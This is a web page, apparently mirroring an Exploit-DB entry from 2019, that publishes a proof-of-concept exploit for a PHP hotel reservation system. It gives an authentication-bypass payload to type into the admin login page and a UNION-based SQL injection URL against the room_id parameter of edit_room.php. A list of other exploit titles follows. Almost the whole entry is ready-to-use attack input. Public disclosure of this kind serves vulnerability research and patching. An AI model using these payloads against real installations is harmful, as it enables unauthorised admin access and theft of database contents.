Simple Online Hotel Reservation System – SQL Injection

Exploit Database
16 阅读

作者： Mr Winst0n

日期： 2019-02-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46461/

# Exploit Title: Simple Online Hotel Reservation System- SQL Injection / Authentication Bypass
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1 


# PoC:

# Authentication Bypass:

# Go to admin login page (http://localhost/[PATH]/admin/index.php), then use below payload as username and password => Username: ' or 1 -- -			
			Password: ' or 1 -- -

# SQL Injection:

# http://localhost/[PATH]/admin/edit_room.php?room_id=4 [SQLi]
# http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20-

last Exploits
Simple Online Hotel Reservation System – SQL Injection的更多信息

Video WiFi Transfer 1.01 – Directory Traversal：
Nagios XI 5.7.3 – ‘Contact Templates’ Persistent Cross-Site Scripting：
dnaLIMS DNA Sequencing – Directory Traversal / Session Hijacking / Cross-Site Scripting：
Moodle 3.9 – Remote Code Execution (RCE) (Authenticated)：
ZeroCMS 1.0 – ‘zero_view_article.php’ SQL Injection：
Entrepreneur B2B Script 2.0.4 – ‘id’ SQL Injection：
Gnat-TGP 1.2.20 – Remote File Inclusion：
Busewe 1.2 – SQL Injection：